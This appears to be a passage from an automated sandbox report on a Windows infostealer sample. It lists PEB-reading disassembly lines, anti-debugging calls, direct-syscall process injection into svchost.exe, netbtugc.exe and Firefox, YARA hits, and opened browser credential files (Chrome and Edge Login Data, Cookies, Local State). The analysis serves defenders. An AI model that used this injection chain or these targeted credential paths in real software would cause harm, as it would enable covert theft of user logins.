Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A30AD0 mov eax, dword ptr fs:[00000030h] 2_2_03A30AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A64AD0 mov eax, dword ptr fs:[00000030h] 2_2_03A64AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A64AD0 mov eax, dword ptr fs:[00000030h] 2_2_03A64AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A6CA24 mov eax, dword ptr fs:[00000030h] 2_2_03A6CA24
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A5EA2E mov eax, dword ptr fs:[00000030h] 2_2_03A5EA2E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A54A35 mov eax, dword ptr fs:[00000030h] 2_2_03A54A35
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A54A35 mov eax, dword ptr fs:[00000030h] 2_2_03A54A35
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A6CA38 mov eax, dword ptr fs:[00000030h] 2_2_03A6CA38
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03ABCA11 mov eax, dword ptr fs:[00000030h] 2_2_03ABCA11
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A6CA6F mov eax, dword ptr fs:[00000030h] 2_2_03A6CA6F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A6CA6F mov eax, dword ptr fs:[00000030h] 2_2_03A6CA6F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A6CA6F mov eax, dword ptr fs:[00000030h] 2_2_03A6CA6F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03ADEA60 mov eax, dword ptr fs:[00000030h] 2_2_03ADEA60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AACA72 mov eax, dword ptr fs:[00000030h] 2_2_03AACA72
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AACA72 mov eax, dword ptr fs:[00000030h] 2_2_03AACA72
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h] 2_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h] 2_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h] 2_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h] 2_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h] 2_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h] 2_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h] 2_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A40A5B mov eax, dword ptr fs:[00000030h] 2_2_03A40A5B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A40A5B mov eax, dword ptr fs:[00000030h] 2_2_03A40A5B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h] 2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h] 2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h] 2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h] 2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h] 2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h] 2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h] 2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h] 2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h] 2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h] 2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h] 2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h] 2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h] 2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A309AD mov eax, dword ptr fs:[00000030h] 2_2_03A309AD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A309AD mov eax, dword ptr fs:[00000030h] 2_2_03A309AD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB89B3 mov esi, dword ptr fs:[00000030h] 2_2_03AB89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB89B3 mov eax, dword ptr fs:[00000030h] 2_2_03AB89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB89B3 mov eax, dword ptr fs:[00000030h] 2_2_03AB89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03ABE9E0 mov eax, dword ptr fs:[00000030h] 2_2_03ABE9E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A629F9 mov eax, dword ptr fs:[00000030h] 2_2_03A629F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A629F9 mov eax, dword ptr fs:[00000030h] 2_2_03A629F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AC69C0 mov eax, dword ptr fs:[00000030h] 2_2_03AC69C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h] 2_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h] 2_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h] 2_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h] 2_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h] 2_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h] 2_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A649D0 mov eax, dword ptr fs:[00000030h] 2_2_03A649D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AFA9D3 mov eax, dword ptr fs:[00000030h] 2_2_03AFA9D3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB892A mov eax, dword ptr fs:[00000030h] 2_2_03AB892A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AC892B mov eax, dword ptr fs:[00000030h] 2_2_03AC892B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AAE908 mov eax, dword ptr fs:[00000030h] 2_2_03AAE908
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AAE908 mov eax, dword ptr fs:[00000030h] 2_2_03AAE908
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03ABC912 mov eax, dword ptr fs:[00000030h] 2_2_03ABC912
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A28918 mov eax, dword ptr fs:[00000030h] 2_2_03A28918
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A28918 mov eax, dword ptr fs:[00000030h] 2_2_03A28918
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A56962 mov eax, dword ptr fs:[00000030h] 2_2_03A56962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A56962 mov eax, dword ptr fs:[00000030h] 2_2_03A56962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A56962 mov eax, dword ptr fs:[00000030h] 2_2_03A56962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A7096E mov eax, dword ptr fs:[00000030h] 2_2_03A7096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A7096E mov edx, dword ptr fs:[00000030h] 2_2_03A7096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A7096E mov eax, dword ptr fs:[00000030h] 2_2_03A7096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AD4978 mov eax, dword ptr fs:[00000030h] 2_2_03AD4978
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AD4978 mov eax, dword ptr fs:[00000030h] 2_2_03AD4978
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03ABC97C mov eax, dword ptr fs:[00000030h] 2_2_03ABC97C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AB0946 mov eax, dword ptr fs:[00000030h] 2_2_03AB0946
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B04940 mov eax, dword ptr fs:[00000030h] 2_2_03B04940
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A30887 mov eax, dword ptr fs:[00000030h] 2_2_03A30887
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03ABC89D mov eax, dword ptr fs:[00000030h] 2_2_03ABC89D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03AFA8E4 mov eax, dword ptr fs:[00000030h] 2_2_03AFA8E4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A6C8F9 mov eax, dword ptr fs:[00000030h] 2_2_03A6C8F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A6C8F9 mov eax, dword ptr fs:[00000030h] 2_2_03A6C8F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A5E8C0 mov eax, dword ptr fs:[00000030h] 2_2_03A5E8C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B008C0 mov eax, dword ptr fs:[00000030h] 2_2_03B008C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h] 2_2_03A52835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h] 2_2_03A52835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h] 2_2_03A52835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A52835 mov ecx, dword ptr fs:[00000030h] 2_2_03A52835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h] 2_2_03A52835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h] 2_2_03A52835
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock, 0_2_004238DA
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_0041F250 SetUnhandledExceptionFilter, 0_2_0041F250
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0041A208
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00417DAA

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe NtResumeThread: Direct from: 0x773836AC Jump to behavior
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe NtMapViewOfSection: Direct from: 0x77382D1C Jump to behavior
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe NtWriteVirtualMemory: Direct from: 0x77382E3C Jump to behavior
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe NtProtectVirtualMemory: Direct from: 0x77382F9C Jump to behavior
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe NtSetInformationThread: Direct from: 0x773763F9 Jump to behavior
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe NtCreateMutant: Direct from: 0x773835CC Jump to behavior
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe NtNotifyChangeKey: Direct from: 0x77383C2C Jump to behavior
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe NtSetInformationProcess: Direct from: 0x77382C5C Jump to behavior
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe NtCreateUserProcess: Direct from: 0x7738371C Jump to behavior
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe NtQueryInformationProcess: Direct from: 0x77382C26 Jump to behavior
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe NtResumeThread: Direct from: 0x77382FBC Jump to behavior
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe NtWriteVirtualMemory: Direct from: 0x7738490C Jump to behavior
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe NtAllocateVirtualMemory: Direct from: 0x77383C9C Jump to behavior
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe NtReadFile: Direct from: 0x77382ADC Jump to behavior
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe NtAllocateVirtualMemory: Direct from: 0x77382BFC Jump to behavior
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe NtDelayExecution: Direct from: 0x77382DDC Jump to behavior
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe NtQuerySystemInformation: Direct from: 0x77382DFC Jump to behavior
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe NtOpenSection: Direct from: 0x77382E0C Jump to behavior
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe NtQueryVolumeInformationFile: Direct from: 0x77382F2C Jump to behavior
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe NtQuerySystemInformation: Direct from: 0x773848CC Jump to behavior
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe NtCreateKey: Direct from: 0x77382C6C Jump to behavior
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe NtReadVirtualMemory: Direct from: 0x77382E8C Jump to behavior
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe NtAllocateVirtualMemory: Direct from: 0x773848EC Jump to behavior
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe NtQueryAttributesFile: Direct from: 0x77382E6C Jump to behavior
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe NtSetInformationThread: Direct from: 0x77382B4C Jump to behavior
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe NtTerminateThread: Direct from: 0x77382FCC Jump to behavior
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe NtQueryInformationToken: Direct from: 0x77382CAC Jump to behavior
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe NtOpenKeyEx: Direct from: 0x77382B9C Jump to behavior
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe NtAllocateVirtualMemory: Direct from: 0x77382BEC Jump to behavior
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe NtDeviceIoControlFile: Direct from: 0x77382AEC Jump to behavior
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe NtCreateFile: Direct from: 0x77382FEC Jump to behavior
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe NtOpenFile: Direct from: 0x77382DCC Jump to behavior
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe NtProtectVirtualMemory: Direct from: 0x77377B2E Jump to behavior
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: NULL target: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: NULL target: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Thread register set: target process: 3060 Jump to behavior
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 30B2008 Jump to behavior
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_00436CD7 LogonUserW, 0_2_00436CD7
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW, 0_2_0040D590
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00434418
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event, 0_2_0043333C
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\jpdy1E8K4A.exe" Jump to behavior
Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe" Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_00446124
Source: URUrIrqwFu.exe, 00000003.00000002.3983513250.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, URUrIrqwFu.exe, 00000003.00000000.2269464937.0000000000BE1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: IProgram Manager
Source: jpdy1E8K4A.exe, URUrIrqwFu.exe, 00000003.00000002.3983513250.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, URUrIrqwFu.exe, 00000003.00000000.2269464937.0000000000BE1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: URUrIrqwFu.exe, 00000003.00000002.3983513250.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, URUrIrqwFu.exe, 00000003.00000000.2269464937.0000000000BE1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: URUrIrqwFu.exe, 00000003.00000002.3983513250.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, URUrIrqwFu.exe, 00000003.00000000.2269464937.0000000000BE1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: jpdy1E8K4A.exe Binary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW, 0_2_004720DB
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_00472C3F GetUserNameW, 0_2_00472C3F
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte, 0_2_0041E364
Source: C:\Users\user\Desktop\jpdy1E8K4A.exe Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary, 0_2_0040E500

Stealing of Sensitive Information

barindex
Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.2356846252.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3983803562.0000000003360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3981537741.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3984182354.00000000040E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3983690192.0000000003310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2361090040.0000000007C30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2357806281.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3991557809.0000000007130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
